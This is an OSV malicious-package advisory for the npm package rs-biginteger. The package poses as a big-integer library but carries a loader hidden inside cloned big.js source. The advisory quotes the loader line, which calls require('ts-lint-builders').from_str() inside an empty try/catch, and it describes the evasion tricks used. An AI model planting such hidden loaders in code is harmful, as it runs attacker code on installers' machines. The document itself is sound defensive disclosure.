MAL-2026-6675

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rs-biginteger/MAL-2026-6675.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6675
Aliases
  • GHSA-xm5w-w96q-42f3
Published
2026-06-30T14:10:13Z
Modified
2026-07-09T23:02:03.373372729Z
Summary
Malicious code in rs-biginteger (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (796cb1ee4c8398963dcc192d2fc9b425866f40f7a99b467cba1d160234508617)

Package presents itself as a big-integer arithmetic library and ships the verbatim big.js v7.0.1 source plus its README. Injected between the P.minus and P.mod method definitions in both big.js and big.mjs is a loader: try { const doc = require("ts-lint-builders"); doc.from_str().then(...) } catch (error) {}. On every require('rs-biginteger') / ESM import, the module top-level resolves ts-lint-builders and invokes its from_str() function, executing third-party code chosen by this author at load time. The package's declared dependency is ts-lint-builders-v2.1@2.1.0 — a name mismatch with the require target, indicating the attacker controls the resolution path into the installer's dependency graph. The empty try/catch silently swallows any failure, concealing the behavior from casual inspection. The loader's placement mid-file inside cloned legitimate source, the cover-story package name impersonating big.js/big-integer, the duplicated payload in both CommonJS and ESM entry points, and the silent error swallowing are deliberate evasion patterns. Installers expecting a pure-math library instead load and execute arbitrary attacker-chosen code on every import.

Source: ghsa-malware (c4c6d1869f82f8162a8219a520ad9e885e55e925ee006a503f657083120c78ee)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "c4c6d1869f82f8162a8219a520ad9e885e55e925ee006a503f657083120c78ee",
            "id": "GHSA-xm5w-w96q-42f3",
            "import_time": "2026-06-30T15:09:17.675248559Z",
            "modified_time": "2026-06-30T14:10:13Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "source": "ghsa-malware"
        },
        {
            "versions": [
                "6.1.5"
            ],
            "id": "IN-MAL-2026-009374",
            "modified_time": "2026-07-09T17:02:54Z",
            "sha256": "983883a1a8bbd732c686abf6c6298425952625aaf4de72ab2a862b26a98a54f4",
            "import_time": "2026-07-09T17:19:30.689724776Z",
            "source": "amazon-inspector"
        },
        {
            "versions": [
                "6.1.3"
            ],
            "id": "IN-MAL-2026-009560",
            "modified_time": "2026-07-09T22:13:35Z",
            "sha256": "796cb1ee4c8398963dcc192d2fc9b425866f40f7a99b467cba1d160234508617",
            "import_time": "2026-07-09T22:56:34.409571917Z",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / rs-biginteger

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

6.*
6.1.3
6.1.5

Database specific

indicators
{
    "evidence_files": [
        {
            "tlsh": "cdc2658c3ac67579593363788f465088eb38525712c8b186b4ae63b46f78cb107b5fdc",
            "sha256": "7d3c7d774ce3d9231e144c52830418ee9a38e7fd6f1c7d9f5c83c882ab8485ad",
            "path": "big.js"
        },
        {
            "sha256": "113c54266356396d3943dc1a9e03b17f6b952031c0af544c8183d653aa65b4b4",
            "tlsh": "fa21f263c9a09ea70af85b94786c43aaf1161b2f41a08c5bb07b230c4f3355b2195bbd",
            "path": "package.json"
        }
    ]
}
cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rs-biginteger/MAL-2026-6675.json"